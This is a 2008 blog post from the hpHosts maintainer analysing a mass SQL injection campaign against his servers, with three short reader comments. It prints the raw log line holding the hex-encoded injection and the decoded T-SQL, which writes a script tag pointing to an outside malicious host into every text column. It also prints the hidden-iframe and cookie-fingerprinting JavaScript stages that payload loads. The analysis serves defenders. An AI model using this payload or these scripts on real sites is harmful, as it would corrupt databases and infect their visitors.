Blog for hpHosts, and whatever else I feel like writing about ....

Sunday, 24 August 2008

Exploit efforts increased ......

SQL ExploitYou know you're doing something right when they ramp up their efforts.

I've been seeing these attacks for quite some time now, and they're getting ever more persistent, with the attacks more than doubling within the past few days. The exploit attempts show in the server log as;

2008-08-23 18:32:23 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C
40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534
F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A
6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E
78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F
7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F
437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F
2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E
20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F
7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2
F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D
20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C
736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F
772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D
20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F
437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC
(@S); 80 - 58.61.134.162 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1
;+InfoPath.1) - mysteryfcm.co.uk 200 0 0


Previously these attacks were aimed more toward the hpHosts server. Now however, they're aimed at all of the servers on the network, guess I'm annoying the right people???.

The above CAST string is Hex encoded, and decodes to;

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor


This then loads;

*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: hxxp://www0.douhunqn.cn/csrss/w.js
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 3
Date: 24 August 2008
Time: 16:30:54:30
*****************************************************************
window.onerror=function()
{
document.write("<iframe width=0 height=0 src=hxxp://www0.douhunqn.cn/csrss/new.htm></iframe>");
return true;
}
if(typeof(js2eus)=="undefined")
{
var js2eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=hxxp://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');


document.write("<iframe width=0 height=0 src=hxxp://www0.douhunqn.cn/csrss/new.htm></iframe>");

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() + "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() + "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}


Which loads;

*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: hxxp://www0.douhunqn.cn/csrss/new.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 2
iFrames: 5
Date: 24 August 2008
Time: 16:31:27:31
*****************************************************************
<script src='hxxp://s96.cnzz.com/stat.php?id=1019605&web_id=1019605' language='javaScript' charset='gb2312'></script>
<iframe src=flash.htm width=100 height=10></iframe>
<iframe src=06014.html width=100 height=10></iframe>
<iframe src=yahoo.htm width=100 height=10></iframe>
<iframe src=office.htm width=100 height=10></iframe>
<iframe src=ksx.htm width=100 height=10></iframe>
<script src="hxxp://js.users.51.la/2094465.js"></script>


s96.cnzz.com is using FastFlux and loads;


*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: hxxp://s96.cnzz.com/stat.php?id=1019605&web_id=1019605
Server IP: 219.232.241.133 [ Resolution failed ]
    > 219.232.241.136 [ Resolution failed ]
    > 219.232.241.139 [ Resolution failed ]
    > 219.232.241.141 [ Resolution failed ]
    > 219.232.241.143 [ Resolution failed ]
    > 219.232.241.144 [ Resolution failed ]
    > 219.232.241.145 [ Resolution failed ]
    > 219.232.243.4 [ Resolution failed ]
    > 219.232.243.5 [ Resolution failed ]
    > 219.232.243.6 [ Resolution failed ]
    > 219.232.243.7 [ Resolution failed ]
    > 219.232.243.8 [ Resolution failed ]
    > 219.232.243.9 [ Resolution failed ]
    > 219.232.243.10 [ Resolution failed ]
    > 219.232.243.55 [ Resolution failed ]
    > 219.232.243.56 [ Resolution failed ]
    > 219.232.241.132 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
Date: 24 August 2008
Time: 16:39:34:39
*****************************************************************
function gv_cnzz(of){
var es = document.cookie.indexOf(";",of);
if(es==-1) es=document.cookie.length;
return unescape(document.cookie.substring(of,es));
}
function gc_cnzz(n){
var arg=n+"=";
var alen=arg.length;
var clen=document.cookie.length;
var i=0;
while(i<clen){
var j=i+alen;
if(document.cookie.substring(i,j)==arg) return gv_cnzz(j);
i=document.cookie.indexOf(" ",i)+1;
if(i==0) break;
}
return -1;
}
var ed=new Date();
var now=parseInt(ed.getTime());
var agt=navigator.userAgent.toLowerCase();
var data='&agt='+escape(agt)+'&r='+escape(document.referrer)+'&aN='+escape(navigator.appName)+'&lg='+escape(navigator.systemLanguage)+'&OS='+escape(navigator.platform)+'&aV='+escape(navigator.appVersion)+'&ntime=0.42642600 1219592199';
var cnzz_a=gc_cnzz("cnzz_a1019605");
if(cnzz_a!=-1) cnzz_a=parseInt(cnzz_a)+1;
else cnzz_a=0;
var rt=parseInt(gc_cnzz("rtime"));
var lt=parseInt(gc_cnzz("ltime"));
var eid=gc_cnzz("cnzz_eid");
if(eid==-1) eid=Math.floor(Math.random()*100000000)+"-"+document.referrer;
if(lt<1000000){rt=0;lt=0;}
if(rt<1) rt=0;
if(((now-lt)>500*86400)&&(lt>0)) rt++;
data=data+'&repeatip='+cnzz_a+'&rtime='+rt+'&cnzz_eid='+escape(eid)+'&showp='+escape(screen.width+'x'+screen.height);
document.write('<a href="hxxp://www.cnzz.com/stat/website.php?web_id=1019605" target=_blank title="Õ¾³¤Í³¼Æ">Õ¾³¤Í³¼Æ</a>');
document.write('<img src="hxxp://222.77.187.203/stat.htm?id=1019605'+data+'" border=0 width=0 height=0>');
var et=(86400-ed.getHours()*3600-ed.getMinutes()*60-ed.getSeconds());
ed.setTime(now+1000*(et-ed.getTimezoneOffset()*60));
document.cookie="cnzz_a1019605="+cnzz_a+";expires="+ed.toGMTString()+ "; path=/";
ed.setTime(now+1000*86400*182);
document.cookie="rtime="+rt+";expires="+ed.toGMTString()+ ";path=/";
document.cookie="ltime="+now+";expires=" + ed.toGMTString()+ ";path=/";
document.cookie="cnzz_eid="+escape(eid)+ ";expires="+ed.toGMTString()+";path=/";

3 comments:

TeMerc said...

Hehhe...keep up the good work. F those guys

Roland19d said...

We're seeing it too. Gotta love bot nets controlled from mainland China.

Asmdar said...

We're seeing it too. Thanks for post, we found very quickly the attacks in ours logs.
Thanks from Argentina !!!